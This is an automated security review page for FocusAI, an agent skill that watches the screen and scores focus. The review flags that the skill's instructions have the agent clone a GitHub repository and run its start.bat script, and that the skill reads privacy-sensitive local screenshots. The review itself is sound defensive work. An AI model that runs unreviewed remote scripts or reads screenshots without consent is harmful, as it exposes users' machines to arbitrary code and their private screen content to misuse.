Skillv1.0.1

ClawScan security

help stay focus . currently only support chinese · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

SuspiciousMar 10, 2026, 1:59 PM

Verdict: suspicious
Confidence: medium
Model: gpt-5-mini
Summary: The skill's actions generally match its stated purpose (local screenshot monitoring and history queries), but it instructs cloning and running external code (start.bat) and accessing local screenshots which requires careful review and explicit user consent before installation or execution.
Guidance: This skill's behavior is coherent with a local screen-monitoring tool, but it asks you (or the agent) to clone a GitHub repo and run start.bat — which could execute arbitrary code. Before installing or running: 1) Require explicit user consent for any monitoring and confirm how long screenshots are kept. 2) Manually review the GitHub repository and inspect start.bat and any startup scripts to confirm they are safe. 3) If possible, run the service in a sandboxed or disposable VM / isolated account rather than your main workstation. 4) Limit where screenshots are stored and who can access that folder. 5) Prefer textual confirmation from the user before the agent performs clone/run actions; do not allow automatic installation. If you cannot review the repo or do not trust it, do not run start.bat or allow the agent to perform the git clone.

Review Dimensions

Purpose & Capability: okThe name and description claim local visual monitoring, focus scoring, and history queries; the instructions consistently reference local data under ~/Desktop/FocusOS_Data, endpoints on localhost (127.0.0.1:8765), and CSV/JPG artifacts. These requirements align with a screen-monitoring/focus tool.
Instruction Scope: noteSKILL.md instructs the agent to read local data directories (CSV and JPG files), call a local HTTP API, and only proceed when user consent is obtained. Reading local screenshots and timestamps is expected for the stated purpose but is highly privacy-sensitive; the skill's instructions emphasize consent, which is appropriate. There are minor inconsistencies in examples (PowerShell Test-Path vs Python os.path checks), but nothing that changes intent.
Install Mechanism: concernAlthough this is an instruction-only skill with no built-in install spec, the instructions tell the user/agent to git clone https://github.com/HR2AY/focusAI and run start.bat. Downloading and executing a remote repository (start.bat) is potentially hazardous because that script can run arbitrary commands on the host. GitHub is a common host, but cloning + running an unreviewed startup script raises non-trivial risk and should be manually audited before execution.
Credentials: okThe skill declares no required environment variables, binaries, or config paths beyond the local data directory. The requested filesystem and localhost access are proportional to a screen-monitoring tool. There are no unrelated credentials or broad cloud permissions requested.
Persistence & Privilege: okThe skill does not request always:true and does not declare modifications to other skills or global agent settings. It describes starting/stopping a local service (FocusAI) but does not demand permanent platform-level privileges.